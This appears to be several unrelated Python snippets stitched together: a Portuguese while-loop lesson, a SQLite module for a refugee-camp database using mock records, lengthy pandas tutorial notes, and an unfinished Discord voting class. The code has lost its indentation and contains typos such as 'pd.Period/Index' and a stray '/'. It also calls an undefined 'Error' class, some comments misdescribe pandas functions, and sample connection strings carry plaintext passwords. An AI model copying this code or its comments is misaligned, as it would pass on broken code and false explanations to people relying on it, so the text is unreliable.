plt.ylabel("Loss")
plt.show() |
#Loop simples
cont = 1
while cont <= 10:
print(cont, "-->", end="")
cont += 1
print("FIM")
#Loop infinito, só para manualmente ou com comando break
cont = 1
while True:
print(cont, "-->", end="")
cont += 1
print("FIM")
#Teste com entrada de dados infinita até digitar o flag 999
n = 0
while n != 999:
n = int(input("Digite um número"))
#Teste com entrada de dados em que soma o 999 com outros valores
n = s = 0
while n != 999:
n = int(input("Digite um número"))
s += n
print("A soma vale {}".format(s))
#Para remover o 999 da soma da forma correta:
#Soma ocorre e codigo roda normalmente ate digitar 999
n = s = 0
while True:
n = int(input("Digite um número"))
if n == 999:
break
s += n
print("A soma vale {}".format(s))
#Print com f strings
print(f"A soma vale {s}")
nome = "Jose"
idade = 33
salario = 987.35
print(f"O {nome} tem {idade} anos")
print(f"O {nome} tem {idade} anos e ganha R$ {salario:.2f}")
|
import sqlite3
import os
import sys
import csv
import refugee
DATABASE_CON = os.path.join(os.getcwd(),"pythonsqlite.db")
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by db_file
:param db_file: database file
:return: Connection object or None
"""
try:
conn = sqlite3.connect(db_file)
return conn
except Error as e:
print(e)
return None
def create_table(conn, create_table_sql):
""" create a table from the create_table_sql statement
:param conn: Connection object
:param create_table_sql: a CREATE TABLE statement
:return:
"""
try:
c = conn.cursor()
c.execute(create_table_sql)
except Error as e:
print(e)
def create_tables(database):
""" declare sqlite schema
"""
create_person_table = """ CREATE TABLE IF NOT EXISTS Person (
person_id integer PRIMARY KEY,
name text NOT NULL,
date_of_birth text NOT NULL,
marital_status text NOT NULL,
citizenship text NOT NULL,
education text NOT NULL,
occupation text NOT NULL,
religion text NOT NULL,
ethnic_origin text NOT NULL,
date_of_arrival text NOT NULL
); """
create_origin_address_table = """CREATE TABLE IF NOT EXISTS Origin_Address (
addr_id integer PRIMARY KEY,
address text NOT NULL,
region text NOT NULL,
city text NOT NULL,
postal_code text NOT NULL,
country text NOT NULL
);"""
create_camp_locations_table = """CREATE TABLE IF NOT EXISTS Camp_Locations (
camp_id integer PRIMARY KEY,
shelter_number text NOT NULL,
block text NOT NULL,
section text NOT NULL
);"""
create_person_origin_table = """CREATE TABLE IF NOT EXISTS Person_Origin (
unique_id integer PRIMARY KEY,
person_id integer NOT NULL,
addr_id integer NOT NULL,
FOREIGN KEY (person_id) REFERENCES Person(person_id),
FOREIGN KEY (addr_id) REFERENCES Origin_Address(addr_id)
);"""
create_person_camp_table = """CREATE TABLE IF NOT EXISTS Person_Camp (
unique_id integer PRIMARY KEY,
person_id integer NOT NULL,
camp_id integer NOT NULL,
FOREIGN KEY (person_id) REFERENCES Person(person_id),
FOREIGN KEY (camp_id) REFERENCES Camp_Locations(camp_id)
);"""
# create a database connection
conn = create_connection(database)
if conn is not None:
# create projects table
create_table(conn, create_person_table)
create_table(conn, create_origin_address_table)
create_table(conn, create_camp_locations_table)
create_table(conn, create_person_origin_table)
create_table(conn, create_person_camp_table)
else:
print("Error! cannot create the database connection.")
conn.commit()
conn.close()
def refugee_db_insertion(prsn, database):
""" Add a row to database to verify table creation
Args: person object to add into database
"""
keys = dict()
conn = create_connection(database)
print(repr(prsn))
if not conn:
sys.exit('Error, cannot create db connection')
cur = conn.cursor()
cur.execute("""INSERT INTO Person (name,
date_of_birth,
marital_status,
citizenship,
education,
occupation,
religion,
ethnic_origin,
date_of_arrival) VALUES (?,?,?,?,?,?,?,?,?);""", (prsn.name,
prsn.date_of_birth,
prsn.marital_status,
prsn.citizenship,
prsn.education,
prsn.occupation,
prsn.religion,
prsn.ethnic_origin,
prsn.date_of_arrival))
keys['person_id'] = cur.lastrowid
cur.execute("""INSERT INTO Origin_Address (address,
city,
region,
postal_code,
country) VALUES (?,?,?,?,?);""", (prsn.place_of_origin.address1,
prsn.place_of_origin.city,
prsn.place_of_origin.region,
prsn.place_of_origin.postal_code,
prsn.place_of_origin.country))
keys['addr_id'] = cur.lastrowid
cur.execute("""INSERT INTO Camp_Locations (shelter_number,
block,
section) VALUES (?,?,?);""", (prsn.camp_location.shelter_number,
prsn.camp_location.block,
prsn.camp_location.section))
keys['camp_id'] = cur.lastrowid
cur.execute("""INSERT INTO Person_Origin (person_id,
addr_id) VALUES (?,?);""", (keys['person_id'],keys['addr_id']))
cur.execute("""INSERT INTO Person_Camp (person_id,
camp_id) VALUES (?,?);""", (keys['person_id'],keys['camp_id']))
conn.commit()
conn.close()
def refugee_db_update(prsn, database):
conn = create_connection(database)
if not conn:
sys.exit('Error, cannot create db connection')
cur = conn.cursor()
cur.execute("""UPDATE Person
SET name=?,
date_of_birth=?,
marital_status=?,
citizenship=?,
education=?,
occupation=?,
religion=?,
ethnic_origin=?,
date_of_arrival=?
WHERE person_id=?;""", (prsn.name,
prsn.date_of_birth,
prsn.marital_status,
prsn.citizenship,
prsn.education,
prsn.occupation,
prsn.religion,
prsn.ethnic_origin,
prsn.date_of_arrival,
prsn.file_number))
addr_id = cur.execute("""SELECT po.addr_id
FROM Person p
INNER JOIN Person_Origin po on po.person_id = p.person_id
WHERE p.person_id=?;""", (prsn.file_number,))
addr_id = list(addr_id)
addr_id = addr_id[0][0]
print(type(addr_id), addr_id)
cur.execute("""UPDATE Origin_Address
SET address=?,
city=?,
region=?,
postal_code=?,
country=?
WHERE addr_id=?;""", (prsn.place_of_origin.address1,
prsn.place_of_origin.city,
prsn.place_of_origin.region,
prsn.place_of_origin.postal_code,
prsn.place_of_origin.country,
addr_id))
camp_id = cur.execute("""SELECT pc.camp_id
FROM Person p
INNER JOIN Person_Camp pc on pc.person_id = p.person_id
WHERE p.person_id=?;""", (prsn.file_number,))
camp_id = list(camp_id)[0][0]
cur.execute("""UPDATE Camp_Locations
SET shelter_number=?,
block=?,
section=?
WHERE camp_id=?;""", (prsn.camp_location.shelter_number,
prsn.camp_location.block,
prsn.camp_location.section,
camp_id))
conn.commit()
conn.close()
def refugee_db_selection(person_id, database):
conn = create_connection(database)
if not conn:
sys.exit('Error, cannot create db connection')
cur = conn.cursor()
result = cur.execute("""SELECT p.person_id, p.name, p.date_of_birth, p.marital_status,
p.citizenship, p.education, p.occupation, p.religion, p.ethnic_origin,
p.date_of_arrival,
oa.address, oa.city, oa.region, oa.postal_code, oa.country,
cl.shelter_number, cl.block, cl.section
FROM Person p
INNER JOIN Person_Origin po ON po.person_id = p.person_id
INNER JOIN Origin_Address oa ON oa.addr_id = po.addr_id
INNER JOIN Person_Camp pc ON pc.person_id = p.person_id
INNER JOIN Camp_Locations cl ON cl.camp_id = pc.camp_id
WHERE p.person_id=?;""", (person_id,))
result = list(result)
if len(result) != 1:
raise Exception("Database selection returned invalid number of results")
result = result[0]
newP = refugee.Person(*result[:10])
newP.setPlaceOfOrigin(result[10], '', *result[11:15])
newP.setCampLocation(*result[15:])
conn.close()
return newP
def refugee_db_get_id_from_name(name, database):
conn = create_connection(database)
if not conn:
sys.exit('Error, cannot create db connection')
cur = conn.cursor()
result = cur.execute("""SELECT person_id
FROM Person
WHERE name=?;""", (name,))
result = list(result)
if len(result) < 1:
raise Exception("Database selection returned invalid number of results")
conn.close()
return result[0][0]
def refugee_db_search_by_name(name, database):
conn = create_connection(database)
if not conn:
sys.exit('Error, cannot create db connection')
cur = conn.cursor()
result = cur.execute("""SELECT p.person_id, p.name, p.date_of_birth, p.marital_status,
p.citizenship, p.education, p.occupation, p.religion, p.ethnic_origin,
p.date_of_arrival,
oa.address, oa.city, oa.region, oa.postal_code, oa.country,
cl.shelter_number, cl.block, cl.section
FROM Person p
INNER JOIN Person_Origin po ON po.person_id = p.person_id
INNER JOIN Origin_Address oa ON oa.addr_id = po.addr_id
INNER JOIN Person_Camp pc ON pc.person_id = p.person_id
INNER JOIN Camp_Locations cl ON cl.camp_id = pc.camp_id
WHERE p.name=?;""", (name,))
result = list(result)
conn.close()
def execute_test_join(database):
""" test table creation by making join based queries
"""
conn = create_connection(database)
if not conn:
sys.exit('Error, cannot create db connection')
cur = conn.cursor()
print(cur.execute("""SELECT * FROM Person p
INNER JOIN Person_Camp pc
ON p.person_id = pc.person_id
INNER JOIN Camp_Locations cl
ON pc.camp_id = cl.camp_id""").fetchall())
print(cur.execute("""SELECT * FROM Person_Camp""").fetchall())
print(cur.execute("""SELECT * FROM Camp_Locations""").fetchall())
print(cur.execute("""SELECT * FROM Person""").fetchall())
conn.close()
def fill_db_with_mock_data(file, database_con):
""" fill database with "mock" data
"""
person_attributes = set(('name', 'date_of_birth', 'marital_status', 'citizenship',
'education', 'occupation', 'religion', 'ethnic_origin', 'date_of_arrival'))
place_of_orig_attrs = set(('address1', 'city', 'region', 'postal_code', 'country'))
camp_loc_attrs = set(('shelter_number', 'block', 'section'))
# use context manager to open csv data
with open(file) as csvfile:
fo = csv.reader(csvfile, delimiter=',')
column_names = next(fo)
for row in fo:
person_dict = dict()
place_orig_dict = dict()
camp_loc_dict = dict()
for i in zip(column_names, row):
if i[0] in person_attributes:
person_dict[i[0]] = i[1]
elif i[0] in place_of_orig_attrs:
place_orig_dict[i[0]] = i[1]
elif i[0] in camp_loc_attrs:
camp_loc_dict[i[0]] = i[1]
else:
sys.exit('invalid value found in csv column header: {}'.format(i[0]))
person_dict['place_of_origin'] = refugee.Address(**place_orig_dict)
person_dict['camp_location'] = refugee.CampLocation(**camp_loc_dict)
person = refugee.Person(**person_dict)
refugee_db_insertion(person, database_con)
if __name__ == '__main__':
person = refugee.Person('John M Doe', '2010-10-20', 'married', 'American',
'High School', 'Mason', 'Agnostic', 'White',
'2017-11-16')
person.setPlaceOfOrigin('123 Pleasant St', '', 'Sharpsburg',
'MD', '12345', 'US')
person.setCampLocation('23F', 'D', '4')
create_tables(DATABASE_CON)
fill_db_with_mock_data('MOCK_DATA.csv', DATABASE_CON)
execute_test_join(DATABASE_CON)
|
#CREATING DATAFRAME
import pandas as pd
weather_stuff = {
'day':['1/1/2017', '1/2/2017', '1/3/2017', '1/4/2017', '1/5/2017', '1/6/2017'],
'temp':[23, 34, 25, 34, 33, 12],
'windspeed':[0, 7, 24, 3, 6, 9],
'event':['rainy', 'sunny', 'snow', 'snow', 'rainy', 'sunny']
}
df = pd.DataFrame(weather_stuff)
print(df)
#CREATING DATAFRAME
import pandas as pd
df = pd.read_csv('weather_stuff.csv')
print(df)
rows, columns = df.shape #GIVES THE SIZE
print(rows)
print(columns)
print(df.head(2)) #PRINTS TOP 2 ROWS
print(df.tail()) #PRINTS ALL ROWS EXCEPT 1ST ROW
print(df[2:5]) #PRINTS THE ROWS BETWEEN 2 AND 5
print(df.columns) #PRINTS NAME OF COLUMNS
print(df.day) #series #ONLY PRINTS DAY COLUMN
print(type(df.day)) #PRINTS #Series
print(type(df)) #PRINTS #Dataframe
print(df[['event', 'day']]) #two columns at a time
print(df['temperature'].max()) #finds max of temperature from all
print(df['temperature'].min()) #finds min of temperature from all
print(df['temperature'].mean()) #finds mean of temperature
print(df['temperature'].std()) #finds standard deviation of temperature
print(df.describe()) #gives the statistics of the integer
print(df[df.temperature >= 32]) #temperature above or 32
print(df['day'][df['temperature'] == df['temperature'].max()]) #print day for max temperature
print(df[['day', 'temperature']][df['temperature'] == df['temperature'].max()]) #prints day and temperature for max temperature
print(df.index)
print(df.set_index('day', inplace = True))
In-place operation is an operation that changes directly the content of a given linear algebra, vector, matrices(Tensor) without making a copy.
The operators which helps to do the operation is called in-place operator
df.set_index('day', inplace = True)
print(df.loc['1/2/2017'])
df.reset_index(inplace = True)
print(df)
df.set_index('event', inplace = True)
print(df.loc['Snow'])
df.reset_index(inplace = True)
print(df)
## Diff ways of Creating Dataframe
import pandas as pd
#Csv
df = pd.read_csv('__.csv')
#Excel
df1 = pd.read_excel('___.xlsx', 'Sheet1')
#Creating dataframe from a dictionary
n = {
'ds':[3, 4, 5],
'sef':['ffs', 'wfw', 'efe']
}
df2 = pd.DataFrame(n)
print(df2)
#Creating dataframe from a tuples list - list contains tuples
x = [
('1/1/2017', 32, 6, 'Rain'),
('1/2/2017', 22, 16, 'sunny'),
('1/3/2017', 12, 26, 'Rain')
]
df3 = pd.DataFrame(x, columns = ['day', 'temp', 'windspeed', 'event'])
print(df3)
#List of dictionaries
a = [
{'day':'1/1/2017', 'temp':23, 'windspeed':7, 'event':'Rainy'},
{'day':'1/2/2017', 'temp':43, 'windspeed':17, 'event':'Sunny'},
{'day':'1/3/2017', 'temp':33, 'windspeed':3, 'event':'Rainy'}
]
df4 = pd.DataFrame(a)
print(df4)
#Other Types - Google for other Types.
READ CSV AND WRITE CSV
import pandas as pd
df = pd.read_csv('work_doc.csv')
df1 = pd.read_csv('work_doc.csv', skiprows = 1)
df2 = pd.read_csv('work_doc.csv', header = 1)
df3 = pd.read_csv('work_doc.csv', header=None)
df4 = pd.read_csv('work_doc.csv', header=None, names=['ticker','eps','revenue','price','people'])
df5 = pd.read_csv('work_doc.csv', nrows = 3)
df6 = pd.read_csv('work_doc.csv', na_values = {
'Eps':['NOT AVAILABLE', 'n.a.'],
'Revenue':['NOT AVAILABLE', 'n.a.', -1],
'Price':['NOT AVAILABLE', 'n.a.'],
'People':['NOT AVAILABLE', 'n.a.']
})
print(df)
print(df1)
print(df2)
print(df3)
print(df4)
print(df5)
print(df6)
print(df6.to_csv('new.csv', index=False, header = False, columns=['Tickers', 'Eps']))
#READ EXCEL AND WRITE EXCEL - xlrd, openpyxl
import pandas as pd
def convert_people_cell(cell):
if cell == 'n.a.':
return 'sam walton'
return cell
def convert_eps_cell(cell):
if cell == 'NOT AVAILABLE':
return None
return cell
df9 = pd.read_excel('stock_data.xlsx', 'Sheet1', converters={
'People': convert_people_cell,
'Eps':convert_eps_cell
})
print(df9)
print(df9.to_excel('new.xlsx', sheet_name = 'Stocks'))
print(df9.to_excel('new.xlsx', sheet_name = 'Stocks', startrow = 2, startcol = 2, index = False))
df_stocks = pd.DataFrame({
'tickers':['GOOGL', 'WMT', 'MSFT'],
'eps':[845, 65, 64],
'price':[30.37, 14.26, 30.97],
'people':[27.82, 4.61, 2.21]
})
df_weather = pd.DataFrame({
'day':['1/1/2017', '1/5/2017', '1/6/2017'],
'temp':[23, 34, 252],
'event':['rainy', 'sunny', 'snow']
})
with pd.ExcelWriter('stocks_weather.xlsx') as writer:
df_stocks.to_excel(writer, sheet_name='stocks')
df_weather.to_excel(writer, sheet_name = 'weather')
#Handle Missing Data
import pandas as pd
df = pd.read_csv('newyork.csv', parse_dates=['Day'])
print(df)
print(type(df.Day[0]))
df.set_index('Day', inplace=True)
print(df)
#Fill Na
x = df.fillna(0)
x = df.fillna({
'Temp':0,
'Windspeed':0,
'Event':'No Event'
})
x = df.fillna(method='ffill') #Carry forward previous days values.
x = df.fillna(method='bfill') #Carry forward next days values.
x = df.fillna(method='bfill', axis='columns') #Axis fill = Horizontal fill
x = df.fillna(method='ffill', limit=1)
print(x)
#Interpolate
y = df.interpolate(method='time') #method = time works only when index set to date time series
print(y)
#Drop Na
z = df.dropna()
z = df.dropna(how='all') # all column values na in a row
z = df.dropna(thresh=1) #atleast one column value in a row
z = df.dropna(thresh=2) #atleast two column value in a row
print(z)
dt = pd.date_range('01/01/2017', '01/11/2017') # Missing Dates
idx = pd.DatetimeIndex(dt)
print(df.reindex(idx))
# Missing data part 2
import pandas as pd
import numpy as np
df = pd.read_csv('dates.csv')
print(df)
new_df = df.replace([-99999, -88888],np.NaN)
new_df = df.replace({
'Temp':-99999,
'Windspeed':-99999,
'Event': 'No Event'
},np.NaN)
new_df = df.replace({
-99999: np.NaN,
'No Event': 'Sunny'
})
print(new_df)
#REGEX
new_df = df.replace('[A-Za-z]','',regex=True)
new_df = df.replace({
'Temp': '[A-Za-z]',
'Windspeed': '[A-Za-z]'
},'',regex=True)
print(new_df)
#LISTS
import pandas as pd
import numpy as np
df = pd.DataFrame({
'score':['exceptional', 'average', 'good', 'poor', 'average', 'exceptional'],
'student':['rob', 'maya', 'parthiv', 'tom', 'julian', 'erica']
})
print(df)
new_df = df.replace(['poor', 'average', 'good', 'exceptional'], [1, 2, 3, 4])
print(new_df)
#GROUP BY
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('city.csv')
g = df.groupby('City')
print(df)
print(g)
for city, city_df in g:
print(city)
print(city_df)
print(g.get_group('Mumbai')) #group by mumbai city
print(g.max()) #Max of each city
print(g.mean()) #Mean or average per each city
print(g.describe())
print(g.plot())
plt.show(g)
#CONCAT DATAFRAMES
import pandas as pd
india_weather = pd.DataFrame({
'city': ['mumbai', 'delhi', 'bangalore'],
'temp':[23, 34, 28],
'humidity':[80, 60, 70]
})
print(india_weather)
usa_weather = pd.DataFrame({
'city': ['NY', 'chicago', 'arizona'],
'temp':[13, 4, 18],
'humidity':[85, 50, 75]
})
print(usa_weather)
print(pd.concat([india_weather, usa_weather]))
df = pd.concat([india_weather, usa_weather], ignore_index=True)
print(df)
df = pd.concat([india_weather, usa_weather], keys = ['india', 'usa'])
print(df)
print(df.loc['usa'])
print(df.loc['india'])
temp_weather = pd.DataFrame({
'city': ['mumbai', 'delhi', 'bangalore'],
'temp':[23, 34, 28]
}, index=[0, 1, 2])
humidity_weather = pd.DataFrame({
'city': [ 'delhi', 'mumbai'],
'humidity':[60, 80]
}, index=[1, 0])
df = pd.concat([temp_weather, humidity_weather], axis=1)
print(df)
s = pd.Series(['Humid', 'Dry', 'Rain'], name='event')
print(s)
df = pd.concat([temp_weather, s], axis=1)
print(df)
# MERGING IN PANDAS
# Pandas provides a single function, merge, as the entry point for all standard database join operations between DataFrame objects −
# pd.merge(left, right, how='inner', on=None, left_on=None, right_on=None,
# left_index=False, right_index=False, sort=True)
# Here, we have used the following parameters −
# left − A DataFrame object.
# right − Another DataFrame object.
# on − Columns (names) to join on. Must be found in both the left and right DataFrame objects.
# left_on − Columns from the left DataFrame to use as keys. Can either be column names or arrays with length equal to the length of the DataFrame.
# right_on − Columns from the right DataFrame to use as keys. Can either be column names or arrays with length equal to the length of the DataFrame.
# left_index − If True, use the index (row labels) from the left DataFrame as its join key(s).
# In case of a DataFrame with a MultiIndex (hierarchical), the number of levels must match the number of join keys from the right DataFrame.
# right_index − Same usage as left_index for the right DataFrame.
# how − One of 'left', 'right', 'outer', 'inner'. Defaults to inner. Each method has been described below.
# sort − Sort the result DataFrame by the join keys in lexicographical order.Defaults to True, setting to False will improve the performance substantially in many cases.
import pandas as pd
df1 = pd.DataFrame({
'city': ['mumbai', 'delhi', 'bangalore', 'kolkata'],
'temp':[23, 34, 28, 31],
'humidity':[80, 60, 65, 50]
})
df2 = pd.DataFrame({
'city': [ 'delhi', 'mumbai', 'kerala' ],
'temp':[34, 23, 32],
'humidity':[60, 80, 45]
})
df = pd.merge(df1, df2, on='city', how = 'inner') #bydefault how = 'inner'
df = pd.merge(df1, df2, on='city', how='outer', indicator=True) # contains all the data
df = pd.merge(df1, df2, on='city', how='left') # contains all the left join data
df = pd.merge(df1, df2, on='city', how='right') # contains all the right join data
df = pd.merge(df1, df2, on='city', suffixes=('_left', '_right'))
print(df)
# Pivot Table - Used to summarize and aggregate the data.
import pandas as pd
df = pd.read_csv('city_all.csv')
print(df)
df1 = df.pivot(index='Day', columns='City', values='Humidity')
df1 = df.pivot(index='Humidity', columns='City')
print(df1)
df2 = df.pivot_table(index='City', columns='Day', margins=True) #default aggfunc = mean
print(df2)
dff = pd.read_csv('weather1.csv')
dff['Day'] = pd.to_datetime(dff['Day'])
print(dff)
print(type(dff['Day'][0]))
df3 = dff.pivot_table(index=pd.Grouper(freq='M', key='Day'), columns='City')
print(df3)
# Reshape DataFrame Using Melt - Transform or Reshape Data.
import pandas as pd
df = pd.read_csv('Melt.csv')
print(df)
x = pd.melt(df, id_vars=['Day'])
print(x)
z = (x[x['variable'] == 'Chicago'])
print(z)
x1 = pd.melt(df, id_vars=['Day'], var_name='City', value_name='Temperature')
print(x1)
y = (x1[x1['City'] == 'Chicago'])
print(y)
# Stack and Unstack
import pandas as pd
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
df = pd.read_excel('Stack_Unstack.xlsx', header=[0, 1])
print(df)
print(df.stack())
print(df.stack(level=0))
print(df.unstack())
#Cross Tab - Frequency Distribution
import pandas as pd
import numpy as np
df = pd.read_csv('namom.csv')
print(df)
x = pd.crosstab(df.Nationality, df.Handedness) #shows freq that is number of time occurences.
print(x)
y = pd.crosstab(df.Sex, [df.Handedness, df.Nationality], margins = True)
y = pd.crosstab([df.Nationality, df.Sex], df.Handedness, margins = True)
y = pd.crosstab([df.Nationality], [df.Sex], normalize='index')
y = pd.crosstab([df.Nationality], [df.Sex], margins=True)
y = pd.crosstab([df.Sex], [df.Handedness], values=df.Age, aggfunc=np.average)
print(y)
# Read AND Write Data WITH THE DATABASES
# from sqlalchemy import create_engine
engine = create_engine('postgresql://scott:tiger@localhost:5432/mydatabase')
engine = create_engine('mysql+mysqldb://scott:tiger@localhost/foo')
engine = create_engine('oracle://scott:tiger@127.0.0.1:1521/sidname')
engine = create_engine('mssql+pyodbc://mydsn')
# sqlite://<nohostname>/<path>
# where <path> is relative:
engine = create_engine('sqlite:///foo.db')
# or absolute, starting with a slash:
engine = create_engine('sqlite:////absolute/path/to/foo.db')
import pandas as pd
import sqlalchemy as sa
urllib is a Python module that can be used for opening URLs. It defines functions and classes to help in URL actions. With Python you can also access and retrieve data from the internet like XML, HTML, JSON, etc. You can also use Python to work with this data directly
import urllib
params = urllib.parse.quote_plus("DRIVER={SQL Server Native Client 11.0};"
"SERVER=LAPTOP-4228MCME\SQLEXPRESS;"
"DATABASE=just;"
"UID=sa;"
"PWD=Password8")
engine = sa.create_engine("mssql+pyodbc:///?odbc_connect={}".format(params))
df = pd.read_sql_table('WORKER71', engine, columns=('FIRST_NAME', 'LAST_NAME', 'SALARY'))
print(df)
query = '''
Select W.FIRST_NAME, W.LAST_NAME, T.WORKER_TITLE
FROM WORKER71 W INNER JOIN TITLE T
ON W.WORKER_ID = T.WORKER_REF_ID
'''
df = pd.read_sql_query(query, engine)
print(df)
x = pd.read_csv('jobs1.csv')
x.rename(columns={
'workerid':'WORKER_ID',
'firstname': 'FIRST_NAME',
'lastname': 'LAST_NAME',
'salary': 'SALARY',
'date': 'JOINING_DATE',
'dept': 'DEPARTMENT'
}, inplace=True)
print(x)
df.to_sql(
name='WORKER71',
con=engine,
index=False,
if_exists='append'
)
pandas.read_Sql('workers71', engine) #we can also execute query here
#TIMESERIES ANALYSIS = Timeseries is a set of data points indexed in time order.
# M = MONTH; W = WEEK; Q = QUARTER
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('appl.csv', parse_dates=['Date'], index_col='Date')
print(df)
print(df.index)
print(df['2017-01'])
print(df['2017-01'].Close.mean())
print(df['2017-01-03'])
print(df['2017-01-07':'2017-01-01'])
print(df['Close'].resample('M').mean())
x = df['Close'].resample('M').mean()
print(x)
x = df['Close'].resample('W').mean()
print(x)
x = df['Close'].resample('Q').mean()
print(x)
#TIMESERIES ANALYSIS
import pandas as pd
import numpy as np
df = pd.read_csv('appl_no_dates.csv')
print(df.head(5))
rng = pd.date_range(start='6/1/2016', end='6/30/2016', freq='B')
print(rng)
df.set_index(rng, inplace=True)
print(df.head())
print(df['2016-06-01':'2016-06-18'])
print(df['2016-06-01':'2016-06-18'].Close.mean())
print(df.asfreq('D', method='pad')) #WEEKENDS ALSO INCLUDED
print(df.asfreq('W', method='pad')) #WEEKLY
print(df.asfreq('H', method='pad')) #HOURLY
rng = pd.date_range(start='6/1/2016', periods=72, freq='H')
print(rng)
ts = np.random.randint(0, 10, len(rng))
ts = pd.Series(np.random.randint(0, 10, len(rng)), index=rng)
print(ts)
#HOLIDAYS
import pandas as pd
import numpy as np
from datetime import datetime
from pandas.tseries.holiday import USFederalHolidayCalendar
from pandas.tseries.holiday import AbstractHolidayCalendar, nearest_workday, Holiday
from pandas.tseries.offsets import CustomBusinessDay
df = pd.read_csv('appl_no_dates.csv')
print(df)
rng = pd.date_range(start='7/1/2017', end='7/21/2017', freq='B')
print(rng)
us_cal = CustomBusinessDay(calendar=USFederalHolidayCalendar())
rng = pd.date_range(start='7/1/2017', end='7/21/2017', freq=us_cal)
print(rng)
df.set_index(rng, inplace=True)
print(df)
class myCalendar(AbstractHolidayCalendar):
rules = [
Holiday('My Birth Day', month=4, day=12) #, observance=nearest_workday),
]
my_bday = CustomBusinessDay(calendar=myCalendar())
print(pd.date_range('4/1/2017','4/30/2017',freq=my_bday))
print(pd.date_range(start='4/1/2017', end='4/30/2017',freq=my_bday))
egypt_weekdays = "Sun Mon Tue Wed Thu"
b = CustomBusinessDay(weekmask=egypt_weekdays)
print(pd.date_range(start="7/1/2017",periods=20,freq=b))
b = CustomBusinessDay(holidays=['2017-07-04', '2017-07-10'], weekmask=egypt_weekdays)
print(pd.date_range(start="7/1/2017",periods=20,freq=b))
dt = datetime(2017, 7, 9, 0, 0)
print(dt)
print(dt+1*b)
#to_datetime
import pandas as pd
dates = ['2017-01-05', 'Jan 5, 2017', '01/05/2017', '2017.01.05', '2017/01/05','20170105']
print(pd.to_datetime(dates))
dt = ['2017-01-05 2:30:00 PM', 'Jan 5, 2017 14:30:00', '01/05/2016', '2017.01.05', '2017/01/05','20170105']
print(pd.to_datetime(dt))
print(pd.to_datetime('30-12-2016'))
print(pd.to_datetime('5-1-2016'))
print(pd.to_datetime('5-1-2016', dayfirst=True))
print(pd.to_datetime('2017$01$05', format='%Y$%m$%d'))
print(pd.to_datetime('2017#01#05', format='%Y#%m#%d'))
print(pd.to_datetime(['2017-01-05', 'Jan 6, 2017', 'abc'], errors='ignore'))
print(pd.to_datetime(['2017-01-05', 'Jan 6, 2017', 'abc'], errors='coerce'))
current_epoch = 1501324478
print(pd.to_datetime(current_epoch, unit='s'))
print(pd.to_datetime(current_epoch*1000, unit='ms'))
t = pd.to_datetime([current_epoch], unit='s')
print(t)
t.view('int64')
print(t)
# PERIOD AND PERIODINDEX
import pandas as pd
y = pd.Period('2016')
print(y)
print(y.start_time)
print(y.end_time)
print(y.is_leap_year)
m = pd.Period('2017-12', freq='M')
print(m)
print(m.start_time)
print(m.end_time)
print(m+1)
d = pd.Period('2016-02-28', freq='D')
print(d)
print(d.start_time)
print(d.end_time)
print(d+1)
h = pd.Period('2017-08-15 23:00:00',freq='H')
print(h)
print(h+1)
print(h+pd.offsets.Hour(1))
q1 = pd.Period('2017Q1', freq='Q-JAN')
print(q1)
print(q1.start_time)
print(q1.end_time)
print(q1.asfreq('M',how='start'))
print(q1.asfreq('M',how='end'))
w = pd.Period('2017-07-05',freq='W')
print(w)
print(w-1)
w2 = pd.Period('2017-08-15',freq='W')
print(w2)
print(w2-w)
r = pd.period_range('2011', '2017', freq='q')
print(r)
print(r[0].start_time)
print(r[0].end_time)
r1 = pd.period_range('2011', '2017', freq='q-jan')
print(r1)
print(r1[0].start_time)
print(r1[0].end_time)/
r2 = pd.PeriodIndex(start='2016-01', freq='3M', periods=10)
print(r2)
import numpy as np
ps = pd.Series(np.random.randn(len(r2)), r2)
print(ps)
print(ps.index)
print(ps['2016'])
print(ps['2016':'2017'])
pst = ps.to_timestamp()
print(pst)
print(pst.index)
x = pst.to_period()
print(x)
print(x.index)
df = pd.read_csv('wmt.csv')
print(df)
df.set_index('Line Item', inplace=True)
print(df)
df = df.T
print(df)
print(df.index)
df.index = pd.Period/Index(df.index, freq='Q-JAN')
print(df.index)
print(df.index[0].start_time)
df["Start Date"]=df.index.map(lambda x: x.start_time)
print(df)
df["End Date"]=df.index.map(lambda x: x.end_time)
print(df)
# #TimeZone Handling
# Two types of datetimes in python:-
# 1.Naive (no timezone awareness)
# 2.Timezone aware datetime
import pandas as pd
df = pd.read_csv("ms.csv",index_col='Date' ,parse_dates=['Date'])
print(df)
print(df.index)
df.tz_localize(tz='US/Eastern')
df.index = df.index.tz_localize(tz='US/Eastern')
print(df.index)
df = df.tz_convert('Europe/Berlin')
print(df)
print(df.index)
from pytz import all_timezones
print(all_timezones)
df.index = df.index.tz_convert('Asia/Calcutta')
print(df)
london = pd.date_range('3/6/2012 00:09:00', periods=10, freq='H',tz='Europe/London')
print(london)
td = pd.date_range('3/6/2012 00:00', periods=10, freq='H',tz='dateutil/Europe/London')
print(td)
rng = pd.date_range(start="2017-08-22 09:00:00",periods=10, freq='30min')
print(rng)
s = pd.Series(range(10),index=rng)
print(s)
b = s.tz_localize(tz="Europe/Berlin")
print(b)
print(b.index)
m = s.tz_localize(tz="Asia/Calcutta")
print(m)
print(m.index)
print(b+m)
#SHIFTING AND LAGGING
import pandas as pd
df = pd.read_csv("mj.csv",parse_dates=['Date'],index_col='Date')
print(df)
print(df.shift(1))
print(df.shift(-1))
df['Prev_Day_Price'] = df['Price'].shift(1)
df['Price_Change'] = df['Price'] - df['Prev_Day_Price']
df['5_day_return'] = (df['Price'] - df['Price'].shift(5))*100/df['Price'].shift(5)
df = df[['Price']]
print(df)
print(df.index)
df.index = pd.date_range(start='2017-08-15',periods=10, freq='B')
print(df)
print(df.index)
print(df.tshift(1))
|
import threading
class Vote:
voters = []
confirmed = [] # members who have voted yes
active = False
mutee = None # person to be muted
timer = None
def __init__(self, voters, mutee):
self.voters = voters
self.mutee = mutee
self.timer = threading.Timer(10, self.stop)
def activate(self):
self.active = True
self.timer.start()
# returns message to respond with
def confirm(self, member):
# check if user is a valid voter
if member not in self.voters:
return f"Sorry, {member.mention}, you cannot vote in this election!"
if member not in self.confirmed:
self.confirmed.append(member)
return f"Thank you for your vote {member.mention}! Now at {len(self.confirmed)}/{len(self.voters)}"
return f"Naughty naughty! You already voted {member.mention}"
# returns true if majority vote
def is_majority(self):
if len(self.confirmed) > (len(self.voters) / 2):
self.timer.cancel()
return True
return False
def stop(self):
